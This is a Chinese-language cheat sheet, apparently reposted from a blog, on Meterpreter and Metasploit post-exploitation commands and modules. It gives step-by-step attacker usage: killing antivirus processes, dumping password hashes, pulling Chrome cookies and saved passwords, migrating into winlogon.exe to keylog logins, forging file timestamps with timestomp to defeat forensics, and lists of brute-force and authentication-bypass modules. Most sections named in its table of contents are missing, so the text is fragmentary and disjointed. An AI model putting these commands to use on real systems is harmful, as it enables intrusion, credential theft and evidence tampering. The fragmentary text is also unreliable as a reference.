Metasploit中的Meterpreter模塊在后滲透階段具有強(qiáng)大的攻擊力，本文主要整理了meterpreter的常用命令、腳本及使用方式。包含信息收集、提權(quán)、注冊表操作、令牌操縱、哈希利用、后門植入等。

文章目錄

• • 0x01.系統(tǒng)命令
  • 0x02.文件系統(tǒng)命令
  • 0x03.網(wǎng)絡(luò)命令
  • 0x04.敏感信息收集
  • 0x05.@提權(quán)@
  • • 小插曲值UAC繞過
  • 0x06.mimikatz抓取密碼
  • 0x07.遠(yuǎn)程桌面&截屏
  • 0x08.開啟rdp(遠(yuǎn)程桌面)&添加用戶
  • 0x09.鍵盤記錄
  • 0x10.@sniffer抓包@
  • 0x11.注冊表操作
  • 0x12.盜取令牌
  • 0x13.哈希利用
  • @0x14.后門植入@
  • **關(guān)閉防火墻和殺軟**
  • 0x15.掃描腳本
  • 0X16.各種腳本
  • @綁定進(jìn)程@
  • 基于MACE時(shí)間的反電子取證
  • 一些常用的破解模塊(就是各種..._login)
  • 一些好用的模塊

0x01.系統(tǒng)命令

1.基本系統(tǒng)命令

sessions #sessions -h 查看幫助 sessions -i <ID值> #進(jìn)入回話 -k殺死會(huì)話 background #將當(dāng)前會(huì)話至于后臺(tái) run #執(zhí)行已有模塊或腳本，輸入run后按兩下tab鍵，列出已有的腳本 info <...> #查看已有模塊信息 grtuid #查看權(quán)限 getpid #查看當(dāng)前進(jìn)程的pid sysinfo #查看目標(biāo)機(jī)系統(tǒng)信息 ps #查看當(dāng)前活躍進(jìn)程 idletime #查看目標(biāo)機(jī)閑置時(shí)間，顯示目標(biāo)機(jī)器截止到當(dāng)前無操作命令的時(shí)間 reboot/shutdown #重啟/關(guān)機(jī) shell #進(jìn)入目標(biāo)機(jī)cmd shell（如果出錯(cuò)，考慮是目標(biāo)主機(jī)限制了cmd.exe的訪問權(quán),可以使用migrate注入到管理員用戶進(jìn)程中再嘗試） load/use #加載模塊

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[] Killing Antivirus services on the target...
[] Killing off sh.exe...
[*] Killing off sh.exe...

0x15.掃描腳本

掃描的腳本位于：

/usr/share/metasploit-framework/modules/auxiliary/scanner/

掃描的腳本較多，僅列幾個(gè)代表：

use auxiliary/scanner/http/dir_scanner use auxiliary/scanner/http/jboss_vulnscan use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/mysql/mysql_version use auxiliary/scanner/oracle/oracle_login

0X16.各種腳本

為獲取遠(yuǎn)程機(jī)器上的信息，在meterpreter中還有很多腳本可用，做更大的滲透測試。

使用run <scriptname>來使用meterpreter模塊中的腳本命令。

(1) run packetrecorder

查看目標(biāo)系統(tǒng)的所有網(wǎng)絡(luò)流量，并且進(jìn)行數(shù)據(jù)包記錄，-i 1指定記錄數(shù)據(jù)包的網(wǎng)卡。

從下圖中運(yùn)行之后返回的信息中可以到我們需要查看的目標(biāo)系統(tǒng)的網(wǎng)絡(luò)流量信息將被存儲(chǔ)的路徑，可以到下面路徑中直接查看。

(2) run get_local_subnets

得到本地子網(wǎng)網(wǎng)段

(3) run getcountermeasure

顯示HIPS和AV進(jìn)程的列表，顯示遠(yuǎn)程機(jī)器的防火墻規(guī)則，列出DEP和UAC策略

(4) run scraper

從目標(biāo)主機(jī)獲得所有網(wǎng)絡(luò)共享等信息(密碼等)。

并且獲得的這些所有這些信息都存儲(chǔ)在/root/.msf4/logs/scripts/scraper directory目錄下。使用ls命令查看存儲(chǔ)的這些文件。

(5)run killav

命令終止Av進(jìn)程，可以很快的清除我們的路徑和有效滲透測試的記錄

但是這個(gè)腳本,不能絕對(duì)得逃避殺毒軟件，但是如果成功了對(duì)被攻擊者會(huì)是一個(gè)嚴(yán)重的打擊，對(duì)他造成很大的困擾。

使用了 “run killav”命令后xp會(huì)終止Av進(jìn)程然后彈出窗口：

(6) run hashdump

獲得密碼哈希值

運(yùn)行這個(gè)腳本和在meterpreter下直接運(yùn)行hashdump結(jié)果差不多。

(7) run dumplinks

Link文件包含時(shí)間戳，文件位置，共享名，卷序列號(hào)，等。腳本會(huì)在用戶目錄和office目錄中收集lnk文件

調(diào)用post/windows/gather/dumplinks獲取目標(biāo)主機(jī)上最近訪問過的文檔、鏈接信息

命令：run post/windows/gather/dumplinks

效果如下圖：

(8) duplicate

再次產(chǎn)生payload，注入到其他進(jìn)程或打開新進(jìn)程并注入其中

(9) run enum_chrome

獲取chrome中的信息，包括cooikie，歷史紀(jì)錄，書簽,登錄密碼等。同理：enum_firefox

(10) run get_env

獲取所有用戶的環(huán)境變量

(11) run getgui

可以很方便的開啟遠(yuǎn)程桌面服務(wù)，添加用戶，端口轉(zhuǎn)發(fā)功能

(12) run gettelnet

同之前開啟終端桌面服務(wù)的腳本，這個(gè)是用來開啟telnet的

(13)run hostsedit

操作hosts文件

(14)run win32-sshserver

安裝openssh服務(wù)

(15) run winenum

會(huì)自動(dòng)運(yùn)行多種命令，將命令結(jié)果保存到本地

@綁定進(jìn)程@

Meterpreter既可以單獨(dú)運(yùn)行，也可以與其他進(jìn)程進(jìn)行綁定。因此，我們可以讓Meterpreter與類似explorer.exe這樣的進(jìn)程進(jìn)行綁定，并以此來實(shí)現(xiàn)持久化。

在下面的例子中，我們會(huì)將Meterpreter跟winlogon.exe綁定，并在登錄進(jìn)程中捕獲鍵盤記錄。

首先，我們需要使用“ps”命令查看目標(biāo)設(shè)備中運(yùn)行的進(jìn)程：

接下來，使用“getpid”找出需要綁定的進(jìn)程，接下來，使用migrate命令+pid來綁定進(jìn)程。

綁定完成之后，我們就可以開始捕獲鍵盤數(shù)據(jù)了：

接下來，我們可以選擇導(dǎo)出鍵盤記錄，或者使用命令“enum_logged_on_users”來檢查用戶是否成功登錄：

等待片刻之后，使用keyscan_dump命令導(dǎo)出記錄信息:

捕捉到的用戶密碼為trustno1。

基于MACE時(shí)間的反電子取證

**小插曲：**文件四屬性（MACE）

只要有人訪問文件并讀取其內(nèi)容。文件的MACE屬性立即發(fā)生變化！這對(duì)取證非常的有好處。

MACE 是：Modified-Accessed-Created-Entry 這四個(gè)單詞的縮寫！

Modified：修改時(shí)間

Accessed：訪問時(shí)間

Created：創(chuàng)建時(shí)間

Entry Modified： 條目修改時(shí)間

timestomp -v secist.txt #查看當(dāng)前目標(biāo)文件 MACE 時(shí)間。

timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的創(chuàng)建時(shí)間，例如修改文件的創(chuàng)建時(shí)間（反取證調(diào)查）

timestomp -f c:\AVScanner.ini secist.txt （將模板文件MACE時(shí)間，復(fù)制給當(dāng)前secist.txt文件）

之后就是愉快的內(nèi)網(wǎng)掃描了!haha!

一些常用的破解模塊(就是各種…_login)

auxiliary/scanner/mssql/mssql_login auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/telnet/telnet_login auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mysql/mysql_login auxiliary/scanner/oracle/oracle_login auxiliary/scanner/postgres/postgres_login auxiliary/scanner/vnc/vnc_login auxiliary/scanner/pcanywhere/pcanywhere_login auxiliary/scanner/snmp/snmp_login auxiliary/scanner/ftp/anonymous

• 13

一些好用的模塊

auxiliary/admin/realvnc_41_bypass (Bypass VNCV4網(wǎng)上也有利用工具) auxiliary/admin/cisco/cisco_secure_acs_bypass （cisco Bypass 版本5.1或者未打補(bǔ)丁5.2版洞略老） auxiliary/admin/http/jboss_deploymentfilerepository （內(nèi)網(wǎng)遇到Jboss最愛:)） auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令執(zhí)行:) auxiliary/admin/mssql/mssql_exec （用爆破得到的sa弱口令進(jìn)行執(zhí)行命令沒回顯:(） auxiliary/scanner/http/jboss_vulnscan (Jboss 內(nèi)網(wǎng)滲透的好朋友) auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令執(zhí)行sql語句:) auxiliary/admin/oracle/post_exploitation/win32exec （爆破得到Oracle弱口令來Win32命令執(zhí)行） auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用戶來執(zhí)行sql語句) auxiliary/scanner/rsync/modules_list （Rsync） auxiliary/scanner/misc/redis_server (Redis) auxiliary/scanner/ssl/openssl_heartbleed (心臟滴血) auxiliary/scanner/mongodb/mongodb_login (Mongodb) auxiliary/scanner/elasticsearch/indices_enum (elasticsearch) auxiliary/scanner/http/axis_local_file_include (axis本地文件包含) auxiliary/scanner/http/http_put (http Put) auxiliary/scanner/http/gitlab_user_enum (獲取內(nèi)網(wǎng)gitlab用戶) auxiliary/scanner/http/jenkins_enum (獲取內(nèi)網(wǎng)jenkins用戶) auxiliary/scanner/http/svn_scanner （svn Hunter :)） auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破) auxiliary/scanner/http/zabbix_login （Zabbix :)）

本節(jié)所涉及的windows系統(tǒng)程序：

• svchost.exe是微軟Windows操作系統(tǒng)中的系統(tǒng)文件，微軟官方對(duì)它的解釋是：svchost.exe 是從動(dòng)態(tài)鏈接庫 (DLL) 中運(yùn)行的服務(wù)的通用主機(jī)進(jìn)程名稱。這個(gè)程序?qū)ο到y(tǒng)的正常運(yùn)行是非常重要，而且是不能被結(jié)束的。許多服務(wù)通過注入到該程序中啟動(dòng)，所以會(huì)有多個(gè)該文件的進(jìn)程。
• explorer.exe是Windows程序管理器或者文件資源管理器，它用于管理Windows圖形殼，包括桌面和文件管理，刪除該程序會(huì)導(dǎo)致Windows圖形界面無法使用。explorer.exe也有可能是w32.Codered等病毒。該病毒通過email郵件傳播，當(dāng)打開病毒發(fā)送的附件時(shí)，即被感染，會(huì)在受害者機(jī)器上建立SMTP服務(wù)，允許攻擊者訪問你的計(jì)算機(jī)、竊取密碼和個(gè)人數(shù)據(jù)。
• winlogon.exe是Windows NT 用戶登陸程序，用于管理用戶登錄和退出。該進(jìn)程的正常路徑應(yīng)是C:\Windows\System32，且是以 SYSTEM 用戶運(yùn)行，若不是以上路徑且不以 SYSTEM 用戶運(yùn)行，則可能是 W32.Netsky.D@mm 蠕蟲病毒，該病毒通過 EMail 郵件傳播，當(dāng)你打開病毒發(fā)送的附件時(shí)，即會(huì)被感染。

總結(jié)

以上是生活随笔為你收集整理的Meterpreter重要命令与使用的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。